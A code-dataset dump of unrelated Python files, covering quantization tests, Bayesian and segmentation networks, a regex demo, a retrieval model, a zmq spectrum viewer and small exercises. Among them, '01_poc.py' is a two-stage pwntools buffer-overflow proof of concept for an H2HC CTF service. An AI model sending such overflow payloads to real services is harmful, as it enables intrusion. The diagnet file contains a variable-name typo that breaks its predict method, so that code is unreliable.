nncf_config = get_quantization_config_without_range_init(model_size=1)\n nncf_config[\"compression\"][\"quantize_outputs\"] = True\n nncf_config[\"input_info\"] = [\n {\n \"sample_size\": [1, 1, 1, 2],\n },\n ]\n nncf_config[\"target_device\"] = \"VPU\"\n\n compressed_model, compression_ctrl = create_compressed_model_and_algo_for_test(\n SimplerModelForUnifiedScalesTesting(),\n nncf_config)\n\n with torch.no_grad():\n for quant_info in compression_ctrl.non_weight_quantizers.values():\n if isinstance(quant_info.quantizer_module_ref, AsymmetricQuantizer):\n quant_info.quantizer_module_ref.input_range *= torch.abs(\n torch.rand_like(quant_info.quantizer_module_ref.input_range))\n else:\n quant_info.quantizer_module_ref.scale *= torch.abs(\n torch.rand_like(quant_info.quantizer_module_ref.scale))\n\n test_input1 = torch.ones([1, 1, 1, 2])\n compressed_model.forward(test_input1)\n\n onnx_path = tmp_path / \"model.onnx\"\n compression_ctrl.export_model(onnx_path)\n\n onnx_model = onnx.load(onnx_path)\n\n def get_fq_nodes(onnx_model: onnx.ModelProto) -> List[onnx.NodeProto]:\n retval = []\n for node in onnx_model.graph.node:\n if str(node.op_type) == \"FakeQuantize\":\n retval.append(node)\n return retval\n\n def immediately_dominates_add_or_mul(node: onnx.NodeProto, graph: onnx.GraphProto) -> bool:\n if len(node.output) != 1:\n return False\n output_tensor_id = node.output[0]\n matches = [x for x in graph.node if output_tensor_id in x.input]\n for match in matches:\n if match.op_type in [\"Add\", \"Mul\"]:\n return True\n return False\n\n def get_successor(node: onnx.NodeProto, graph: onnx.GraphProto) -> onnx.NodeProto:\n assert len(node.output) == 1 # Only single-output nodes are supported in this func\n for target_node in graph.node:\n if node.output[0] in target_node.input:\n return target_node\n return None\n\n def group_nodes_by_output_target(nodes: List[onnx.NodeProto], graph: onnx.GraphProto) -> List[List[onnx.NodeProto]]:\n output_nodes = {} # type: Dict[str, List[onnx.NodeProto]]\n for node in nodes:\n target_node_name = get_successor(node, graph).name\n if target_node_name not in output_nodes:\n output_nodes[target_node_name] = []\n output_nodes[target_node_name].append(node)\n return list(output_nodes.values())\n\n def resolve_constant_node_inputs_to_values(node: onnx.NodeProto, graph: onnx.GraphProto) -> \\\n Dict[str, onnx.AttributeProto]:\n retval = {}\n for input_ in node.input:\n constant_input_nodes = [x for x in graph.node if input_ in x.output and x.op_type == \"Constant\"]\n for constant_input_node in constant_input_nodes:\n assert len(constant_input_node.attribute) == 1\n val = constant_input_node.attribute[0]\n retval[input_] = numpy_helper.to_array(val.t)\n return retval\n\n fq_nodes = get_fq_nodes(onnx_model)\n eltwise_predicate = partial(immediately_dominates_add_or_mul, graph=onnx_model.graph)\n eltwise_fq_nodes = list(filter(eltwise_predicate, fq_nodes))\n fq_nodes_grouped_by_output = group_nodes_by_output_target(eltwise_fq_nodes, onnx_model.graph)\n\n for unified_scale_group in fq_nodes_grouped_by_output:\n inputs = [resolve_constant_node_inputs_to_values(fq_node, onnx_model.graph) for fq_node in unified_scale_group]\n for inputs_dict in inputs[1:]:\n curr_values = list(inputs_dict.values())\n ref_values = list(inputs[0].values())\n assert curr_values == ref_values # All inputs for unified scale quantizers must be equal\n","sub_path":"tests/quantization/test_unified_scales.py","file_name":"test_unified_scales.py","file_ext":"py","file_size_in_byte":34266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"212025220","text":"import torch\nimport torchvision\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom tools import *\nimport operator\nimport itertools\n\nclass diagnet(nn.Module):\n def __init__(self,opt):\n super(diagnet, self).__init__()\n self.feature_dim=opt['feature_dim']\n self.final_weight_dim=opt['feature_dim']*10\n self.conv1 = nn.Conv2d(1, 10, kernel_size=5)\n self.conv2 = nn.Conv2d(10, 20, kernel_size=5)\n self.fc1 = nn.Linear(320, 100)\n self.fc2 = nn.Linear(100, self.feature_dim)\n self.device=opt['device']\n self.if_cuda=opt['if_cuda']\n\n\n self.prior_mu=torch.zeros(self.final_weight_dim, requires_grad=False)\n self.prior_diag=torch.ones(self.final_weight_dim, requires_grad=False)\n\n self.q_mu=torch.randn(self.final_weight_dim, requires_grad=True)\n self.q_diag=torch.ones(self.final_weight_dim, requires_grad=True)\n\n params = list(self.parameters()) + [self.q_mu,self.q_diag]\n self.optimizer = optim.Adam(params, lr=opt['optimizer_lr'])\n self.feature_optimizer = optim.Adam(self.parameters(), lr=0.001)\n self.final_optimizer = optim.Adam([ self.q_mu, self.q_diag ], lr=0.001)\n\n def forward(self, x, final_weight):\n x=x.view(-1,1,28,28)\n x = F.relu(F.max_pool2d(self.conv1(x), 2))\n x = F.relu(F.max_pool2d(self.conv2(x), 2))\n x = x.view(-1, 320)\n x = F.relu(self.fc1(x))\n x =torch.tanh(self.fc2(x))\n x= torch.matmul(x,final_weight)\n return F.log_softmax(x,dim=-1)\n\n\n def feature_forward(self, x ):\n x=x.view(-1,1,28,28)\n x = F.relu(F.max_pool2d(self.conv1(x), 2))\n x = F.relu(F.max_pool2d(self.conv2(x), 2))\n x = x.view(-1, 320)\n x = F.relu(self.fc1(x))\n x = torch.tanh(self.fc2(x))\n return x\n\n def predict(self,x):\n with torch.no_grad():\n eps=torch.randn([100,self.final_weight_dim]).to(self.device)\n final_weight_samples=(torch.sqrt(self.q_diag).repeat(100).view(100,self.final_weight_dim)*eps+self.q_mu).view(100,self.feature_dim,10).permute(0, 2, 1)\n feature_of_data=self.feature_forward(x)\n prediction=(torch.mean(torch.softmax((inal_weight_samples@feature_of_data.t()).permute(2, 0, 1),dim=-1),1).data.max(dim=1, keepdim=True)[1]).view(-1)\n return prediction\n\n\n def test(self,x,label):\n with torch.no_grad():\n eps=torch.randn([100,self.final_weight_dim]).to(self.device)\n final_weight_samples=(torch.sqrt(self.q_diag.to(self.device)).repeat(100).view(100,self.final_weight_dim)*eps+self.q_mu.to(self.device)).view(100,self.feature_dim,10).permute(0, 2, 1)\n feature_of_data=self.feature_forward(x)\n pred=(torch.mean(torch.softmax((final_weight_samples@feature_of_data.t()).permute(2, 0, 1),dim=-1),1).data.max(dim=1, keepdim=True)[1]).view(-1)\n accuracy=(pred == label).sum().item()/label.size(0)\n return accuracy\n\n\n\n def predictive_distribution_entropy_batch(self,x, sample_num=100):\n with torch.no_grad():\n eps=torch.randn([sample_num,self.final_weight_dim]).to(self.device) ### 100*200\n final_weight_samples=(torch.sqrt(self.q_diag.to(self.device)).repeat(sample_num).view(sample_num,self.final_weight_dim)*eps+self.q_mu.to(self.device)).view(sample_num,20,10).permute(0, 2, 1)\n feature_of_data=self.feature_forward(x)### 70*20\n\n output_logit=F.log_softmax((final_weight_samples@feature_of_data.t()).permute(2,0,1),dim=-1) ###70*100*10\n\n eps=torch.randn([sample_num,self.final_weight_dim]).to(self.device)\n final_weight_samples=(torch.sqrt(self.q_diag.to(self.device)).repeat(sample_num).view(sample_num,self.final_weight_dim)*eps+self.q_mu.to(self.device)).view(sample_num,20,10).permute(0, 2, 1)\n feature_of_data=self.feature_forward(x)\n output_probs=F.softmax((final_weight_samples@feature_of_data.t()).permute(2,0,1),dim=-1) ###70*100*10\n output_dis_for_sample=sample_from_batch_categorical_multiple(output_logit,sample_num=30,cuda=self.if_cuda).view(x.size(0),-1) ### 70*100*30\n output_dis_for_sample_one_hot=one_hot_embedding(output_dis_for_sample, 10, cuda=self.if_cuda) ### 70*3000*10\n output_probs=output_probs@output_dis_for_sample_one_hot.permute(0,2,1) ### 70*100*3000\n entropy_list=-torch.mean(torch.log(torch.mean(output_probs,dim=1)),dim=-1)\n return entropy_list\n\n\n\n def online_train(self,x,label,samlpe_num=100):\n train_losses = []\n total_size=x.size(0)\n curr_prior_mu = self.q_mu.clone().detach()\n curr_prior_diag= self.q_diag.clone().detach()\n correct_flag=0\n\n while correct_flag<5:\n self.final_optimizer.zero_grad()\n eps=torch.randn([samlpe_num,self.final_weight_dim]).to(self.device)\n final_weight_samples=(torch.sqrt(self.q_diag).repeat(samlpe_num).view(samlpe_num,self.final_weight_dim)*eps+self.q_mu).view(samlpe_num,self.feature_dim,10).permute(0, 2, 1)\n feature_of_data=self.feature_forward(x)\n output=torch.mean(F.log_softmax((final_weight_samples@feature_of_data.t()).permute(0, 2, 1),dim=-1),0)\n nll_loss= F.nll_loss(output,label,reduction='sum')\n kl=KL_diag_gaussian(self.q_mu,self.q_diag,curr_prior_mu,curr_prior_diag)\n neg_elbo=kl+nll_loss\n neg_elbo.backward()\n self.final_optimizer.step()\n train_losses.append(neg_elbo.item())\n\n\n if output.data.max(dim=1, keepdim=True)[1].item()==label.item():\n correct_flag+=1\n else:\n correct_flag=0\n print(output.data.max(dim=1, keepdim=True)[1].item())\n# plt.plot(train_losses)\n# plt.show()\n\n\n\n def train(self,x,label):\n train_losses = []\n if x.size(0)<100:\n batch_size=x.size(0)\n iteration=1\n else:\n batch_size=100\n iteration=int(x.size(0)/batch_size)\n for epoch in range(0,3000):\n for it in range(0,iteration):\n index=np.random.choice(x.size(0),batch_size)\n self.optimizer.zero_grad()\n eps=torch.randn([self.final_weight_dim]).to(self.device)\n final_weight_sample= (self.q_mu.to(self.device)+eps*torch.sqrt(self.q_diag.to(self.device))).view(self.feature_dim,10)\n output = self.forward(x[index],final_weight_sample)\n nll_loss= F.nll_loss(output,label[index],reduction='sum')*(float(x.size(0))/float(batch_size))\n kl=KL_diag_gaussian(self.q_mu.to(self.device),self.q_diag.to(self.device),self.prior_mu.to(self.device),self.prior_diag.to(self.device))\n neg_elbo=kl+nll_loss\n neg_elbo.backward()\n self.optimizer.step()\n train_losses.append(neg_elbo.item())\n return train_losses\n","sub_path":".ipynb_checkpoints/diagnet-checkpoint.py","file_name":"diagnet-checkpoint.py","file_ext":"py","file_size_in_byte":7055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"25524374","text":"##\n## Programación en Python\n## ===========================================================================\n##\n## Genere una lista de tuplas, donde cada tupla contiene en la primera \n## posicion, el valor de la segunda columna; la segunda parte de la \n## tupla es una lista con las letras (ordenadas y sin repetir letra) \n## de la primera columna que aparecen asociadas a dicho valor de la \n## segunda columna. Esto es:\n##\n## Rta/\n## ('0', ['C'])\n## ('1', ['A', 'B', 'D', 'E'])\n## ('2', ['A', 'D', 'E'])\n## ('3', ['A', 'B', 'D', 'E'])\n## ('4', ['B', 'E'])\n## ('5', ['B', 'C', 'D', 'E'])\n## ('6', ['A', 'B', 'C', 'E'])\n## ('7', ['A', 'C', 'D', 'E'])\n## ('8', ['A', 'B', 'E'])\n## ('9', ['A', 'B', 'C', 'E'])\n##\n## >>> Escriba su codigo a partir de este punto <<<\n##\n\n# Se lee el archivo, se eliminan los finales de línea y se separan por tabulador\ndatos = open('data.csv','r').readlines()\ndatos = [r.replace('\\n','') if r[-1] == '\\n' else r for r in datos]\ndatos = [r.split('\\t') for r in datos]\n\n# Se toman las dos primeras columnas\nletras = [r[0:2] for r in datos]\n\n# Se construye un diccionario y se van agregando cada una de las letras \ndicc = {}\nfor letra, valor in letras:\n if valor in dicc.keys():\n if not letra in dicc[valor]:\n dicc[valor] = dicc[valor] + [letra]\n dicc[valor].sort()\n else:\n dicc[valor] = [letra]\n\n# Se genera la lista\nlista = []\nfor k in sorted(dicc.keys()):\n tupla = (k,dicc[k])\n lista += [(k,dicc[k])]\n print(tupla)\n\n","sub_path":"03-python=1/q08=1/question.py","file_name":"question.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"77172884","text":"import re, sys\nimport colorama as cm\nisVerbose=0\n\n\ndef matchRE(pat, desc):\n if 1: \n print(\" %s\\t%s\" % (pat, desc) )\n else:\n if isVerbose: print(\"pat: %s\" % pat)\n\n s='to be or not really to be'\n\n mo = re.search(pat, s, flags=0)\n if isVerbose: print('matchObj:', mo)\n\n if isVerbose: print(s)\n\n if mo is None:\n print(\"no match at all.\")\n return #exit(0) # actually, success-exit-code is 0 :-/\n\n left = s[ : mo.span()[0] ]\n hilit = mo.group() \n right = s[ mo.span()[1] : ]\n\n a = (\n cm.Back.BLACK\n +cm.Fore.WHITE + left \n +cm.Back.GREEN+cm.Fore.LIGHTGREEN_EX + hilit \n +cm.Back.BLACK +cm.Fore.WHITE + right \n +\"\\n\"\n )\n\n if 0:\n print(a)\n else:\n sys.stdout.write(a)\n\n\n\ndef Main():\n cm.init() #convert=True)\n if len(sys.argv)==2: # regx.py \"hej \\\"med\\\" dig\"\n pat = sys.argv[1]\n matchRE(pat)\n else:\n parts = [\n ['be', 'simple sequence'],\n ['be.*be','kleene star'],\n ['^to.*or', 'start-of-line'],\n ['not.*be$', 'end-of-line'],\n ['.', 'any single char'],\n ['[^ot]', 'any char NOT in class'],\n ['al*y', 'zero or more'],\n ['[nt]o+', 'one or more'],\n ['al?', 'at most one'],\n ['l{2}', 'exactly 2'],\n ['l{1,3}', 'btw 1-3'],\n ['not|be', 'or'],\n ['(n.*t)', 'capture'],\n ['(?:not).*(to).*(?:be)', 'non-capture'],\n ['(?:not).*(\\w+).*(?:be)', 'word'],\n ['(?:not).*(\\s+).*(?:be)', 'space'],\n ]\n for (a,b) in parts:\n matchRE(a,b)\n\nMain()\n","sub_path":"regex/regx.py","file_name":"regx.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"43771837","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 2 23:02:20 2017\n\n@author: shen\n\"\"\"\n\n#!/usr/bin/env python\n\n\"\"\"The simplest TF-IDF library imaginable.\nAdd your documents as two-element lists `[docname,\n[list_of_words_in_the_document]]` with `addDocument(docname, list_of_words)`.\nGet a list of all the `[docname, similarity_score]` pairs relative to a\ndocument by calling `similarities([list_of_words])`.\nSee the README for a usage example.\n\"\"\"\nimport math\nclass QLM:\n def __init__(self):\n self.weighted = False\n self.documents = {}\n self.corpus_dict = {}\n self.sims = {}\n self.a = 0.5\n def add_document(self, doc_name, list_of_words):\n # building a dictionary\n doc_dict = {}\n for w in list_of_words:\n doc_dict[w] = doc_dict.get(w, 0.) + 1.0\n # 計算完每個字的次數\n length = float(len(list_of_words))\n # 處理頻率(除上該文章字數)\n for k in doc_dict:\n doc_dict[k] = doc_dict[k] / length\n #其中一種作法 doc_dict[k] = 1 + doc_dict[k] / length\n # QLM中似乎用不到整個字典的字\n self.documents[doc_name]= doc_dict\n def likelihood(self, list_of_words, queryName):\n \"\"\"Returns a list of all the [docname, similarity_score] pairs relative to a\nlist of words.\n \"\"\"\n\n # building the query dictionary\n #print(self.corpus_dict)\n query_dict = {}\n for w in list_of_words:\n if query_dict.get(w,0)==0:\n query_dict[w] = query_dict.get(w, 0.0) + 1.0\n \"\"\" test for query_dict\n for w in query_dict:\n print(w)\n \"\"\"\n # computing the list of similarities\n QLMDic = {}\n for doc in self.documents:\n #每一篇文件要做的事情\n #1. 讀出名字跟dic\n #2. 與query比對是否存在該字,有的話計算存下字典中,該字出現的機率值並相乘 沒有則不做 ,存在暫存值中\n #3. 把Likelihood中的值相乘所得到最後的值,並配合Doc名放到QLMDic中\n #4. 對QLMDic做排序 \n \n queryLikelihood= 0.0\n #1 得到該document的字典 {}\n dicTemp = self.documents[doc]\n \n #2.\n for w in query_dict:\n queryLikelihood = math.log(self.a*dicTemp.get(w,0.0)+(1-self.a)*float(self.corpus_dict[str(int(w))]))+queryLikelihood\n \n \n #3.\n \n QLMDic[doc] = queryLikelihood\n \n #4. \n self.sims[queryName] = sorted(QLMDic.items(), key=lambda d:d[1], reverse = True)\n #做排序 \n ","sub_path":"QLModel.py","file_name":"QLModel.py","file_ext":"py","file_size_in_byte":2733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"525995910","text":"import common\nimport glob\nimport shutil\nimport os\n\n\ndef getUserDataFolders():\n if not common.Globals.IS_WINDOWS:\n return None\n\n import winreg\n\n try:\n defaultSteamPath = winreg.QueryValueEx(\n winreg.OpenKey(winreg.HKEY_CURRENT_USER, r\"Software\\Valve\\Steam\"),\n \"SteamPath\",\n )[0]\n return glob.glob(\n os.path.join(defaultSteamPath, \"userdata\", \"**\", \"config\"), recursive=True\n )\n except:\n return None\n\n\ndef extractSteamGrid():\n try:\n userDataFolders = getUserDataFolders()\n if userDataFolders:\n for i in userDataFolders:\n shutil.unpack_archive(\"higumi-steamgrid.zip\", i)\n except:\n pass\n","sub_path":"steamGridExtractor.py","file_name":"steamGridExtractor.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"323545526","text":"# https://www.geeksforgeeks.org/power-set/amp/\n\ndef powerset(arr, n):\n size = 2 ** n\n\n for i in range(size):\n for j in range(n):\n if i & (1 << j) > 0:\n print(arr[j], end='')\n print()\n\n\narr = ['A', 'B', 'C']\npowerset(arr, 3); ","sub_path":"dp/powerset.py","file_name":"powerset.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"65488008","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n'''\nAplicação H2HC criado para CTF\nExploit criado por M4v3r1ck (helvio_junior[at]hotmail[dot]com)\n'''\n\nfrom pwn import *\nimport os\n \ncontext(arch='amd64', os='windows', log_level='debug')\n\nhost= \"192.168.255.201\"\nport = 54345\n\n# Estágio 1\nlog.info(\"Enviando estágio 1\")\npayload1 = \"H2HC\" #cookie \npayload1 += \"\\xff\\x00\\x00\\x00\" #size to trigger the vul\npayload1 += \"\\x41\" * 0xff\npayload1 += \"\\n\"\n\np = remote(host, port)\np.send(payload1)\np.recv(4096)\np.close()\n\n# Estágio 2\nlog.info(\"Enviando estágio 2\")\npayload2 = \"H2HC\" \npayload2 += \"\\x05\\x00\\x00\\x00\" \npayload2 += \"A\" * 0x100\npayload2 += \"\\x04\\x03\\x02\\x01\" \npayload2 += \"B\" * 36 \npayload2 += \"\\x08\\x07\\x06\\x05\"\n\np2 = remote(host, port)\np2.send(payload2)\np2.recv(40960)\np2.close()\n\n","sub_path":"2019_H2HC/exploit/01_poc.py","file_name":"01_poc.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"22979835","text":"# This is a sketch of how a popepipe_zmq<->spec interface\n# would work\n# it is not functional\n\nimport zmq\nimport numpy as np\nimport time\nimport mass\nPORT = 2015\n\ntry:\n import PyQt5\n use_pyqt5=True\nexcept:\n use_pyqt5=False\n\nif use_pyqt5:\n print(\"using PyQt5\")\n from PyQt5 import QtGui ,QtCore, uic\n from PyQt5.QtCore import pyqtSlot\n from PyQt5.QtWidgets import (QApplication, QWidget, QFileDialog, QSizePolicy, QVBoxLayout, QTextEdit,QCheckBox)\n from PyQt5.QtGui import QFont\n from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\n from matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar\nelse:\n print(\"failed to import PyQt5, trying PyQt4\")\n from PyQt4 import QtGui ,QtCore, uic\n from PyQt4.QtCore import pyqtSlot, QTimer\n from PyQt4.QtGui import (QApplication, QWidget, QFileDialog, QSizePolicy, QVBoxLayout, QTextEdit,QCheckBox)\n from PyQt4.QtGui import QFont\n from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas\n from matplotlib.backends.backend_qt4agg import NavigationToolbar2QT as NavigationToolbar\n\n\nimport os, sys, h5py\nimport numpy as np\nimport pylab as plt\nfrom matplotlib.figure import Figure\nfrom mass.core.files import LJHFile\nimport mass\nimport argparse\n\nparser = argparse.ArgumentParser(description='A work in progress program to display a live spectrum.',\n epilog=\"\"\"WARNING, PROBABLY NEEDS WORK ON CUTS\"\"\")\nparser.add_argument('calibrationpath', help='path of a mass hdf5 file containing calibration info')\nargs = vars(parser.parse_args())\n\n\nclass MplCanvas(QWidget):\n def __init__(self, parent = None, width=6, height=5, dpi=100):\n QWidget.__init__(self, parent)\n self.fig = Figure(figsize=(width,height), dpi=dpi)\n # self.fig = Figure()\n self.canvas = FigureCanvas(self.fig)\n FigureCanvas.__init__(self.canvas, self.fig)\n self.axes = self.fig.add_subplot(111)\n self.setSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.MinimumExpanding)\n self.canvas.setSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.MinimumExpanding)\n self.canvas.updateGeometry()\n self.mpl_toolbar = NavigationToolbar(self.canvas, self)\n self.vbl = QVBoxLayout()\n self.vbl.addWidget(self.mpl_toolbar)\n self.vbl.addWidget(self.canvas)\n self.setLayout(self.vbl)\n\n\n def clear(self): self.axes.clear()\n def plot(self, *args, **kwargs): return self.axes.plot(*args, **kwargs)\n def set_xlabel(self, *args, **kwargs): return self.axes.set_xlabel(*args, **kwargs)\n def set_ylabel(self, *args, **kwargs): return self.axes.set_ylabel(*args, **kwargs)\n def set_title(self, *args, **kwargs): return self.axes.set_title(*args, **kwargs)\n def set_yscale(self,*args, **kwargs): return self.axes.set_yscale(*args, **kwargs)\n def legend(self, *args, **kwargs): return self.axes.legend(*args, **kwargs)\n def mpl_connect(self, *args, **kwargs): return self.canvas.mpl_connect(*args, **kwargs)\n def draw(self, *args, **kwargs): return self.canvas.draw(*args, **kwargs)\n def onpick(self, event):\n print(\"default pick_event handler for MplCanvas\")\n print(event.artist)\n print(event.ind)\n\n\nctx = zmq.Context() # context is required to create zmq socket\nsocket = zmq.Socket(ctx, zmq.SUB) # make a subscriber socket\nsocket.connect (\"tcp://localhost:%s\" % PORT) # connect to the server\nsocket.set_hwm(10000) # set the recieve side message buffer limit\nsocket.setsockopt(zmq.SUBSCRIBE, \"\") # subscribe to all message, since all start with \"\"\n# define a dtype to match the julia type\ndtype_MassCompatibleDataProductFeb2017=np.dtype([(\"filt_value\",\"f4\"),(\"filt_phase\",\"f4\"),(\"timestamp\",\"f8\"),(\"rowcount\",\n\"i8\"),(\"pretrig_mean\",\"f4\"),(\"pretrig_rms\",\"f4\"),(\"pulse_average\",\"f4\"),(\"pulse_rms\",\"f4\"),\n(\"rise_time\",\"f4\"),(\"postpeak_deriv\",\"f4\"),(\"peak_index\",\"u2\"),(\"peak_value\",\"u2\"),(\"min_value\",\"u2\")])\n\n\nclass CalFile():\n def __init__(self, filename):\n self.h5 = h5py.File(filename,\"r\")\n print(self.h5)\n\n def get_hdf5_group(self,ch):\n return self.h5[\"chan\"+str(ch)][\"calibration\"]\n\n def get_calibration(self,ch):\n hdf5_group = self.get_hdf5_group(ch)\n return mass.EnergyCalibration.load_from_hdf5(hdf5_group,\"p_filt_value\")\n\n def isbad(self,ch):\n return \"why_bad\" in self.h5[\"chan\"+str(ch)].attrs\n\n\ndef apply_calibration(payload, ch, info):\n cal=info[ch][2]\n return cal(payload[\"filt_value\"])\n\ndef iscut(payload, ch, info):\n info_ch = info[ch]\n pt_lo,pt_hi = info_ch[0]\n md_lo,md_hi = info_ch[1]\n v=payload[\"filt_value\"]\n return pt_lo= e1 and epoch <= e2:\n alpha = alpha_max*(epoch-e1)/(e2-1)\n \n for i, data in enumerate(train_loader, 0):\n \n \n \n #Get inputs\n #Wrap them in a Variable object\n if self.gpu_mode:\n input_seg, label_seg = torch.as_tensor(data[1]['image'], dtype=torch.float).cuda() ,torch.as_tensor(data[1]['segment'], dtype=torch.float).cuda()\n input_adv = torch.as_tensor(data[0]['image'], dtype=torch.float).cuda()\n label_adv = torch.as_tensor(data[0]['source'], dtype=torch.float).cuda()\n input_seg, input_adv, label_seg, label_adv = Variable(input_seg), Variable(input_adv),Variable(label_seg), Variable(label_adv)\n else:\n input_seg, label_seg = torch.as_tensor(data[1]['image'], dtype=torch.float) ,torch.as_tensor(data[1]['segment'], dtype=torch.float)\n input_adv = torch.as_tensor(data[0]['image'], dtype=torch.float)\n label_adv = torch.as_tensor(data[0]['source'], dtype=torch.float)\n input_seg, input_adv, label_seg, label_adv = Variable(input_seg), Variable(input_adv),Variable(label_seg), Variable(label_adv)\n \n #Set the parameter gradients to zero\n \n for k in range(2):\n #optimizer_seg.zero_grad()\n #optimizer_adv.zero_grad()\n if k == 0 :\n optimizer_adv.zero_grad()\n \n output_dis = adv(seg(input_adv)[1])\n loss_discriminator = loss_dis(output_dis[0],label_adv)\n \n loss_discriminator.backward()\n optimizer_adv.step()\n running_loss_dis += loss_discriminator.item()\n total_train_loss_dis += loss_discriminator.item()\n loss_adv_value =loss_discriminator.item()\n if output_dis[0].argmax() == label_adv.argmax():\n G+=1\n else:\n F+=1\n \n if k == 1 :\n optimizer_seg.zero_grad()\n output_seg = seg(input_seg)[0]\n loss_adversarial = loss_seg_adv(loss_adv_value,output_seg,label_seg,alpha)\n loss_adversarial.backward()\n optimizer_seg.step()\n running_loss += loss_adversarial.item()\n total_train_loss += loss_adversarial.item()\n \n \n #Forward pass, backward pass, optimize\n \n \n #print(list(net.parameters())[0].grad.mean())\n \n #Print statistics\n\n \n #Print every 10th batch of an epoch\n if (i + 1) % (print_every + 1) == 0:\n print(\"Epoch {}, {:d}% \\t train_loss: {:.2f} took: {:.2f}s\".format(\n epoch+1, int(100 * (i+1) / n_batches), running_loss / print_every, time.time() - start_time))\n print(\"Epoch {}, {:d}% \\t train_loss: {:.2f} took: {:.2f}s\".format(\n epoch+1, int(100 * (i+1) / n_batches), running_loss_dis / print_every, time.time() - start_time))\n print('data max', output_seg[0,0].mean(),output_seg[0,1].mean())\n\n\n \n #Reset running loss and time\n running_loss = 0.0\n running_loss_dis = 0.0\n start_time = time.time()\n \n print('Number of well prediction', G/(G+F))\n #At the end of the epoch, do a pass on the validation set\n #test()\n total_val_loss = 0\n total_val_loss_dis = 0\n \n for data in val_loader:\n \n if self.gpu_mode:\n input_seg, label_seg = torch.as_tensor(data[1]['image'], dtype=torch.float).cuda() ,torch.as_tensor(data[1]['segment'], dtype=torch.float).cuda()\n input_adv = torch.as_tensor(data[0]['image'], dtype=torch.float).cuda()\n label_adv = torch.as_tensor(data[0]['source'], dtype=torch.float).cuda()\n input_seg, input_adv, label_seg, label_adv = Variable(input_seg), Variable(input_adv),Variable(label_seg), Variable(label_adv)\n else:\n input_seg, label_seg = torch.tensor(data[1]['image'], dtype=torch.float) ,torch.tensor(data[1]['segment'], dtype=torch.float)\n input_adv = torch.tensor(data[0]['image'], dtype=torch.float)\n label_adv = torch.tensor(data[0]['source'], dtype=torch.float)\n input_seg, input_adv, label_seg, label_adv = Variable(input_seg), Variable(input_adv),Variable(label_seg), Variable(label_adv)\n \n #Forward pass\n \n val_output_seg = seg(input_seg)[0]\n #output_dis = adv(seg(input_adv)[1])\n \n \n #loss_discriminator = loss_dis(output_dis,label_adv)\n loss_segmenter = loss_seg(val_output_seg,label_seg)\n\n \n total_val_loss += loss_segmenter.item()\n #total_val_loss_dis += loss_discriminator.item()\n \n print(\"Validation loss segmenter = {:.2f}\".format(total_val_loss / len(val_loader)))\n print(\"Validation loss discriminator= {:.2f}\".format(total_val_loss_dis / len(val_loader)))\n\n \n print(\"Training finished, took {:.2f}s\".format(time.time() - training_start_time))\n \n \n def test(self,):\n pred = self.seg.cuda()(torch.tensor(a['image'].reshape(1,3,self.input_dim,self.input_dim),dtype=torch.float).cuda())[0]\n imshow(pred.cpu().detach().numpy().reshape(2,self.input_dim-18,self.input_dim-18)[1])\n pred2 = self.seg.cuda()(torch.tensor(b['image'].reshape(1,3,self.input_dim,self.input_dim),dtype=torch.float).cuda())[0]\n imshow(pred2.cpu().detach().numpy().reshape(2,self.input_dim-18,self.input_dim-18)[1])\n \n def save(self,PATH_seg,PATH_adv):\n torch.save(self.seg.state_dict(), PATH_seg)\n torch.save(self.adv.state_dict(),PATH_adv)\n \n def load(self,PATH_seg,PATH_adv):\n \n self.seg.load_state_dict(torch.load(PATH_seg))\n self.seg.eval()\n \n self.adv.load_state_dict(torch.load(PATH_adv))\n self.adv.eval()\n \n def get_DSC_on_T(self):\n total_loss = 0\n dataloader = torch.utils.data.DataLoader(Tar,\n batch_size = 1,\n shuffle = True,\n num_workers = 0)\n for data in dataloader:\n input_seg, label_seg = torch.as_tensor(data['image'], dtype=torch.float).cuda() ,torch.as_tensor(data['segment'], dtype=torch.float).cuda()\n output = self.seg(input_seg)[0]\n loss = DSC(output,label_seg)\n total_loss += loss.item()\n \n return(total_loss/len(dataloader))\n\n\ninput_dim =150\n\ndef DSC(logits,labels):\n eps=10e-5\n pred = logits.view(2,1,input_dim-18,input_dim-18)\n labels =labels.view(2,1,input_dim-18,input_dim-18)\n precision = torch.sum(pred[1]*labels[1])/torch.sum(pred[1])\n \n recall = torch.sum(pred[1]*labels[1])/torch.sum(labels[1])\n \n return -2*(precision*recall)/(precision+recall+eps)\n \n\n\n","sub_path":"pyTsegmenter.py","file_name":"pyTsegmenter.py","file_ext":"py","file_size_in_byte":17083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"68060153","text":"# -*- coding: utf-8 -*-\n# Copyright 2023 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the 